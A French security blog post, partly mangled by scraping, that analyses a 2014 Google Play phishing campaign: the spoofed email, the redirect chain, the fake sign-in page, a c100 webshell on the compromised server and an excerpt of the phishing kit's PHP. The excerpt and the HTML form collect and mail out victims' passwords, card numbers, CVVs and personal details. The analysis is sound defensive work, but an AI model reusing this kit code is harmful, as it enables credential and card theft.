![\"Phishing\"](\"http:\/\/calypt.com\/blog\/wp-content\/uploads\/2014\/01\/Firefox-phishing-dialog-590x300.png\")
<\/p>\n<\/p>\n
Le jeudi 16 janvier 2014, Calypt a \u00e9t\u00e9 avertie d’un email de phishing diffus\u00e9 le jour m\u00eame. Apr\u00e8s avoir avertis les diff\u00e9rents acteurs, nous vous proposons une rapide analyse de cette attaque.<\/p>\n
<\/p>\n
<\/p>\n
Champ “From”<\/strong> : \u00ab Google Android <support.clients@playg.com> \u00bb<\/p>\n Objet<\/strong> : \u00ab La date d’expiration de votre compte arrive \u00e0 terme \u00bb<\/p>\n Corps du message<\/strong> : une image h\u00e9berg\u00e9e sur un site pirat\u00e9 (marque francaise d’alimentaire) qui malgr\u00e9 notre avertissement et acquitement de leur part, n’as toujours pas retir\u00e9 l’image :<\/p>\n L’image contient un lien vers le m\u00eame site que celui ou elle est heberg\u00e9e. En suivant ce lien on est redirig\u00e9 vers un autre site, vraisemblablement pirat\u00e9 lui aussi et enregistr\u00e9 en Pologne. Comme pour l’image, cette redirection et encore active \u00e0 l’heure de ce post.<\/p>\n <\/p>\n [pastacode provider=”manual” lang=”markup”]<\/p>\n [\/pastacode]<\/p>\n<\/div>\n c100<\/p><\/div>\n<\/div>\n On a donc r\u00e9cuper\u00e9 les fichiers sources de l’attaque dans lesquels on remarque, sans surprise, les \u00e9l\u00e9ments r\u00e9cup\u00e9r\u00e9s puis envoy\u00e9 par email :<\/p>\n [pastacode provider=”manual” lang=”php”]<\/p>\n [\/pastacode]<\/p>\n![\"Phishing](\"http:\/\/calypt.com\/blog\/wp-content\/uploads\/2014\/01\/unnamed.png\")
<\/p>\nLe site de phishing<\/h1>\n
Une fois redirig\u00e9, l’URL du site est http:\/\/195.28.16.33\/Service-\n<form action=\"gConfirm.php\" method=\"post\">\r\n <input type=\"text\" name=\"login\" placeholder=\"Email\" \/>\r\n <input type=\"password\" name=\"pwd\" placeholder=\"Password\" \/>\r\n <input type=\"submit\" name=\"submit\" value=\"Sign in\" \/>\r\n <input type=\"checkbox\" value=\"0\" id=\"staySigned\" name=\"staySigned\" checked=\"checked\" \/>\r\n <\/form><\/code><\/pre>\nComme on l’observe dans le code, une fois les informations entr\u00e9es, on est redirig\u00e9 vers la page gConfirm.php<\/strong>. Cette fois ci, nous sommes sur une page imitant une page de Google play sur laquelle il nous est demand\u00e9 de rentrer notre num\u00e9ro de carte bancaire<\/strong>, ainsi que la r\u00e9ponse \u00e0 une question secr\u00e8te. Le motif employ\u00e9 est le m\u00eame que dans le mail : v\u00e9rifier ses informations pour \u00e9viter de perdre son compte Google play.<\/div>\n<\/div>\n<\/div>\nL’analyse<\/h1>\n
Le serveur utilis\u00e9 pour le phishing (195.28.16.33) semble h\u00e9berger un site vitrine de soci\u00e9t\u00e9 et il y a de grandes chances pour qu’il ait \u00e9t\u00e9 compromis pour ce qui est de sa partie ill\u00e9gale. En utilisant dirbuster<\/a>, on trouve le r\u00e9pertoire 12\/ contenant le webshell c100. Les pirates semblent donc avoir laiss\u00e9 une backdoor accessibles \u00e0 tous …<\/div>\n\n![\"c100\"](\"http:\/\/calypt.com\/blog\/wp-content\/uploads\/2014\/01\/c100.png\")
$mail->message .= \"======BOSS HERE IS THE LOG: DATE & TIME: $date AND IP: $ip=================<br \/>\";\r\n$mail->message .= 'Google ID : '.$_POST['log'].'<br \/>';\r\n$mail->message .= 'Password : '.$_POST['pwd'].'<br \/>';\r\n$mail->message .= '===================================================<br \/>';\r\n$mail->message .= 'CC : '.$_POST['data1'].'<br \/>';\r\n$mail->message .= 'CVV : '.$_POST['data2'].'<br \/>';\r\n$mail->message .= 'Expiration Month : '.$_POST['data3'].'<br \/>';\r\n$mail->message .= 'Expiration Year : '.$_POST['data4'].'<br \/>';\r\n$mail->message .= '===================================================<br \/>';\r\n$mail->message .= 'Security Question : '.$_POST['data5'].'<br \/>';\r\n$mail->message .= 'Security Response : '.$_POST['data6'].'<br \/>';\r\n$mail->message .= 'Full Address : '.$_POST['data11'].'<br \/>';\r\n$mail->message .= 'Birdthay Day : '.$_POST['data7'].'<br \/>';\r\n$mail->message .= 'Birdthay Month : '.$_POST['data8'].'<br \/>';\r\n$mail->message .= 'Birdthay Year : '.$_POST['data9'].'<br \/>';\r\n$mail->message .= 'Full Name : '.$_POST['data10'].'<br \/>';\r\n$mail->message .= 'ip:'.getenv(\"REMOTE_ADDR\").'<br \/>';\r\n$mail->send();<\/code><\/pre>\n